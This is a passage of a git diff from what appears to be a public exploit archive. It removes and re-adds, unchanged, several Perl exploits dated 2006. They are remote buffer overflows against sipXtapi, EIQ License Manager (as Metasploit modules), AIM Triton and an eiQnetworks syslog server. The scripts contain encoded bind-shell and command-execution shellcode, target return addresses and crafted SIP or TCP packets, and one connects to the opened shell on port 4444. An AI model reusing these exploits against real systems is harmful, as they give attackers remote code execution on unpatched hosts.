-"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce".
-"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f".
-"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0".
-"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f";
-my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode;
-
-
-my $packet =<\r
-Via: SIP/2.0/UDP $target:3277\r
-From: "moz"\r
-Call-ID: 3121$target\r
-CSeq: $cseq\r
-Max-Forwards: 70\r
-Contact: \r
-\r
-END
-
-print "Sending Packet to: " . $target . "\n\n";
-socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
-my $ipaddr = inet_aton($target);
-my $sendto = sockaddr_in($target_port,$ipaddr);
-send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
-print "Done.\n";
-$host = $ARGV[0];
-
-print " + connect to $host on port 4444...\n";
-
-system("telnet $host 4444");
-
-# milw0rm.com [2006-07-24]
+#!/usr/bin/perl
+# 
+# Remote Buffer Overflow in sipXtapi
+# 
+# bad char 0x00 0x09 0x0a 0x0d 0x20
+#
+
+
+use IO::Socket;
+#use strict;
+
+print "\n\n";
+print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n";
+print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n";
+
+if (not $ARGV[0]) {
+        print "Usage: sipx.pl \n";
+exit;}
+
+$target=$ARGV[0];
+my $source ="127.0.0.1";
+my $target_port = 5060;
+my $user ="bad";
+my $nextseh = "\xeb\x06\x90\x90";
+my $seh="\xb0\x67\x01\x08";	# pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?
+#my $seh="\x27\x13\x02\x08";	# call ebx in jvm.dll for win2k Pro SP0 Italian universal ?
+#my $seh="\x22\x92\x06\x08";	# jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? 
+				# if you use this ret you can exploits the target host many times
+my $nop = "\x90"x32;
+
+
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode = 
+"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25".
+"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60".
+"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14".
+"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06".
+"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7".
+"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74".
+"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14".
+"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf".
+"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f".
+"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d".
+"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc".
+"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e".
+"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7".
+"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6".
+"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8".
+"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf".
+"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2".
+"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60".
+"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce".
+"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f".
+"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0".
+"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f";
+my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode;
+
+
+my $packet =<\r
+Via: SIP/2.0/UDP $target:3277\r
+From: "moz"\r
+Call-ID: 3121$target\r
+CSeq: $cseq\r
+Max-Forwards: 70\r
+Contact: \r
+\r
+END
+
+print "Sending Packet to: " . $target . "\n\n";
+socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
+my $ipaddr = inet_aton($target);
+my $sendto = sockaddr_in($target_port,$ipaddr);
+send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
+print "Done.\n";
+$host = $ARGV[0];
+
+print " + connect to $host on port 4444...\n";
+
+system("telnet $host 4444");
+
+# milw0rm.com [2006-07-24]
diff --git a/platforms/windows/remote/2074.pm b/platforms/windows/remote/2074.pm
index 572e642fc..3f96bce47 100755
--- a/platforms/windows/remote/2074.pm
+++ b/platforms/windows/remote/2074.pm
@@ -1,86 +1,86 @@
-#!/usr/bin/perl -w
-
-#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
-
-package Msf::Exploit::EiQ_License_1262; 
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'     => 'EIQ License Manager Overflow',
-	'Authors'  => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],
-
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'win2000', 'winxp' ],
-	'Priv'  => 0,
-	
-	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
-	
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 10616],
-	 },
-        'Payload'  =>
-	  {
-		'Space' => 1262,
-		'BadChars'  => "\x00\x0a\x0d\x40\x26",
-            },
-          'Description'  =>  Pex::Text::Freeform(qq{
-	This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
-        Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
-	in size. This module should work on all rebranded eiq analysers.  Exploitation
-	assistance from KF of digital munition.
-        }),
-          
-          
-        'DefaultTarget' => 1,
-	'Targets' =>
-	  [
-	        ['Windows 2000 SP0-SP4 English', 0x750316e2],   # call ebx
-		['Windows XP English SP1/SP2', 0x77db64dc ],	# jmp ebx
-	        ['Windows Server 2003 English SP0/SP1', 0x77d16764 ],   # jmp ebx
-	  ],
-          
-  };
-  
-  sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-  
-  sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target      = $self->Targets->[$target_idx];
-        my $nops 	= $self->MakeNops(1262 - length($shellcode));
-        my $ret         =  pack("V", $target->[1]);
-        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
-	
-            
-        my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-    	  );
-          
-          if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
-          
-          $s->Send("$evil");
-          return;
-  }
-
-# milw0rm.com [2006-07-26]
+#!/usr/bin/perl -w
+
+#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
+
+package Msf::Exploit::EiQ_License_1262; 
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'     => 'EIQ License Manager Overflow',
+	'Authors'  => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],
+
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'win2000', 'winxp' ],
+	'Priv'  => 0,
+	
+	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
+	
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 10616],
+	 },
+        'Payload'  =>
+	  {
+		'Space' => 1262,
+		'BadChars'  => "\x00\x0a\x0d\x40\x26",
+            },
+          'Description'  =>  Pex::Text::Freeform(qq{
+	This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
+        Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
+	in size. This module should work on all rebranded eiq analysers.  Exploitation
+	assistance from KF of digital munition.
+        }),
+          
+          
+        'DefaultTarget' => 1,
+	'Targets' =>
+	  [
+	        ['Windows 2000 SP0-SP4 English', 0x750316e2],   # call ebx
+		['Windows XP English SP1/SP2', 0x77db64dc ],	# jmp ebx
+	        ['Windows Server 2003 English SP0/SP1', 0x77d16764 ],   # jmp ebx
+	  ],
+          
+  };
+  
+  sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+  
+  sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target      = $self->Targets->[$target_idx];
+        my $nops 	= $self->MakeNops(1262 - length($shellcode));
+        my $ret         =  pack("V", $target->[1]);
+        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
+	
+            
+        my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+    	  );
+          
+          if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
+          
+          $s->Send("$evil");
+          return;
+  }
+
+# milw0rm.com [2006-07-26]
diff --git a/platforms/windows/remote/2075.pm b/platforms/windows/remote/2075.pm
index 347234a47..212ac0e90 100755
--- a/platforms/windows/remote/2075.pm
+++ b/platforms/windows/remote/2075.pm
@@ -1,86 +1,86 @@
-#!/usr/bin/perl -w
-
-#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
-
-package Msf::Exploit::EiQ_License_494; 
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'     => 'EIQ License Manager Overflow',
-	'Authors'  => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],
-
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'win2000', 'winxp' ],
-	'Priv'  => 0,
-	
-	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
-	
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 10616],
-	 },
-        'Payload'  =>
-	  {
-		'Space' => 494,
-		'BadChars'  => "\x00\x0a\x0d\x40\x26",
-            },
-          'Description'  =>  Pex::Text::Freeform(qq{
-	This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
-        Field of EIQ networks network analyser this module exploits buffers of 494 bytes
-	in size. This module should work on all EIQ branded analysers.  Exploitation
-	assistance from KF.
-        }),
-          
-          
-        'DefaultTarget' => 1,
-	'Targets' =>
-	  [
-		['Windows 2000 SP0-SP4 English', 0x750316e2],   # call ebx
-		['Windows XP SP1/SP2 English', 0x77db64dc ],	# jmp ebx
-	        ['Windows Server 2003 SP0/SP1 English', 0x77d16764 ],   # jmp ebx 
-	  ],
-          
-  };
-  
-  sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-  
-  sub Exploit {
-	my $self = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $target      = $self->Targets->[$target_idx];
-        my $nops 	= $self->MakeNops(494 - length($shellcode));
-        my $ret         =  pack("V", $target->[1]);
-        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
-	
-            
-        my $s = Msf::Socket::Tcp->new
-	  (
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'LocalPort' => $self->GetVar('CPORT'),
-    	  );
-          
-          if ($s->IsError) {
-		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-		return;
-	}
-          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
-          
-          $s->Send("$evil");
-          return;
-  }
-
-# milw0rm.com [2006-07-26]
+#!/usr/bin/perl -w
+
+#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
+
+package Msf::Exploit::EiQ_License_494; 
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'     => 'EIQ License Manager Overflow',
+	'Authors'  => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],
+
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'win2000', 'winxp' ],
+	'Priv'  => 0,
+	
+	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
+	
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 10616],
+	 },
+        'Payload'  =>
+	  {
+		'Space' => 494,
+		'BadChars'  => "\x00\x0a\x0d\x40\x26",
+            },
+          'Description'  =>  Pex::Text::Freeform(qq{
+	This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
+        Field of EIQ networks network analyser this module exploits buffers of 494 bytes
+	in size. This module should work on all EIQ branded analysers.  Exploitation
+	assistance from KF.
+        }),
+          
+          
+        'DefaultTarget' => 1,
+	'Targets' =>
+	  [
+		['Windows 2000 SP0-SP4 English', 0x750316e2],   # call ebx
+		['Windows XP SP1/SP2 English', 0x77db64dc ],	# jmp ebx
+	        ['Windows Server 2003 SP0/SP1 English', 0x77d16764 ],   # jmp ebx 
+	  ],
+          
+  };
+  
+  sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+  
+  sub Exploit {
+	my $self = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target      = $self->Targets->[$target_idx];
+        my $nops 	= $self->MakeNops(494 - length($shellcode));
+        my $ret         =  pack("V", $target->[1]);
+        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
+	
+            
+        my $s = Msf::Socket::Tcp->new
+	  (
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
+    	  );
+          
+          if ($s->IsError) {
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+		return;
+	}
+          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
+          
+          $s->Send("$evil");
+          return;
+  }
+
+# milw0rm.com [2006-07-26]
diff --git a/platforms/windows/remote/2076.pl b/platforms/windows/remote/2076.pl
index 19aa4e71a..cccfa5c4d 100755
--- a/platforms/windows/remote/2076.pl
+++ b/platforms/windows/remote/2076.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-# 
-# p0c
-# Tested on Windows XP SP2 with triton 1.0.4
-# c0rrupt -{at}- f34r -{dot}- us
-#
-# This exploits the sipxtapi vuln in triton which was patched.. sometime ago..
-# The exploit sends a specially crafted udp packet to the triton client
-# which leads to command execution through a buffer overflow.
-# 
-# The Triton client does not open the sipxtapi port 5061 by default.
-# The port is open when the client attemps to try any talk session, and stays
-# open for the remainder of the time it is running.
-
-use IO::Socket::INET;
-
-$target=$ARGV[0];
-
-$MySocket=new IO::Socket::INET->new(PeerPort=>5061,Proto=>'udp',PeerAddr=>$ARGV[0]);
-
-# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37".
-"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
-"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58".
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58".
-"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
-"\x4b\x38\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x53".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x48\x42\x47\x4e\x31\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b".
-"\x42\x30\x42\x50\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
-"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x55\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56".
-"\x4e\x56\x43\x56\x50\x52\x45\x56\x4a\x47\x45\x36\x42\x50\x5a";
-
-
-if (not $ARGV[0]) 
-{	
-	print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
-	print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";
-        print "[+] Usage: trionPWN.pl  [+]\n";
-	exit;
-}
-
-
-
-print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
-print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";
-
-
-my $cseq = "B"x780 . "\xEB\x0C\x90\x90" . "\xd9\xe7\x01\x40" . "\x90"x500 . $shellcode;
-
-my $packet =
-"INVITE sip:a@127.0.0.1:5555 SIP/2.0\r
-From: ;tag=1c32606\r
-To: sip:CFB5A74A87D97A19@192.168.1.109:5061\r
-Call-Id: 65f65f65d6sexcytv\r
-Cseq: $cseq";
-
-print "[+] Packet Generated.. Sending to " . $target . "\n";
-
-$MySocket->send($packet);
-
-print "[+] Attack completed, check your shell.\n";
-
-# milw0rm.com [2006-07-26]
+#!/usr/bin/perl
+# 
+# p0c
+# Tested on Windows XP SP2 with triton 1.0.4
+# c0rrupt -{at}- f34r -{dot}- us
+#
+# This exploits the sipxtapi vuln in triton which was patched.. sometime ago..
+# The exploit sends a specially crafted udp packet to the triton client
+# which leads to command execution through a buffer overflow.
+# 
+# The Triton client does not open the sipxtapi port 5061 by default.
+# The port is open when the client attemps to try any talk session, and stays
+# open for the remainder of the time it is running.
+
+use IO::Socket::INET;
+
+$target=$ARGV[0];
+
+$MySocket=new IO::Socket::INET->new(PeerPort=>5061,Proto=>'udp',PeerAddr=>$ARGV[0]);
+
+# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37".
+"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
+"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58".
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58".
+"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54".
+"\x4b\x38\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x53".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x48\x42\x47\x4e\x31\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b".
+"\x42\x30\x42\x50\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
+"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x55\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56".
+"\x4e\x56\x43\x56\x50\x52\x45\x56\x4a\x47\x45\x36\x42\x50\x5a";
+
+
+if (not $ARGV[0]) 
+{	
+	print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
+	print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";
+        print "[+] Usage: trionPWN.pl  [+]\n";
+	exit;
+}
+
+
+
+print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
+print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";
+
+
+my $cseq = "B"x780 . "\xEB\x0C\x90\x90" . "\xd9\xe7\x01\x40" . "\x90"x500 . $shellcode;
+
+my $packet =
+"INVITE sip:a@127.0.0.1:5555 SIP/2.0\r
+From: ;tag=1c32606\r
+To: sip:CFB5A74A87D97A19@192.168.1.109:5061\r
+Call-Id: 65f65f65d6sexcytv\r
+Cseq: $cseq";
+
+print "[+] Packet Generated.. Sending to " . $target . "\n";
+
+$MySocket->send($packet);
+
+print "[+] Attack completed, check your shell.\n";
+
+# milw0rm.com [2006-07-26]
diff --git a/platforms/windows/remote/2079.pl b/platforms/windows/remote/2079.pl
index 3a272799b..20c243f01 100755
--- a/platforms/windows/remote/2079.pl
+++ b/platforms/windows/remote/2079.pl
@@ -1,107 +1,107 @@
-#!/usr/bin/perl -w
-# 
-# http://www.digitalmunition.com
-# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
-# Bug found by KF of digitalmunition.com.
-#
-# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
-#
-# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
-#
-# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
-#
-# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
-# forward jump. This would eliminate the need for 2 stages of shellcode. .  
-#
-#SEH chain of thread 00000FF4
-#Address    SE handler
-#013ECEF8   FWASyslo.00449EDB
-#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
-#
-#013EFF74   90909090
-#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
-#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
-#013EFF80   90909090
-#
-#71AA15CF   5F               POP EDI
-#71AA15D0   5D               POP EBP
-#71AA15D1   C2 0800          RETN 8
-#
-# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
-#
-use IO::Socket;
-
-$bufsize = 4096; 
-
-$hostname = "127.0.0.1";
-$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
-$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')
-
-# Binary hunts performed by JxT and Titon
-$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 
-
-unless (($target,$hostname) = @ARGV,$hostname) {
-
-        print "\n        Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
-        print "\n\nUsage: $0  \n\nTargets:\n\n";
-
-        foreach $key (sort(keys %tgts)) {
-                ($a,$b) = split(/\:/,$tgts{"$key"});
-                print "\t$key . $a\n";
-        }
-
-        print "\n";
-        exit 1;
-}
-
-
-($a,$b) = split(/\:/,$tgts{"$target"});
-print "*** Target: $a, Len: $b\n";
-
-# Stage 2 shellcode can be up to Length of SEH overwrite. 
-$sc2 = 
-# win32_bind -  EXITFUNC=seh LPORT=4444 
-# Size=344 Encoder=PexFnstenvSub http://metasploit.com
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
-"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
-"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
-"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
-"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
-"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
-"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
-"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
-"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
-"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
-"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
-"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
-"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
-"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
-"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
-"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
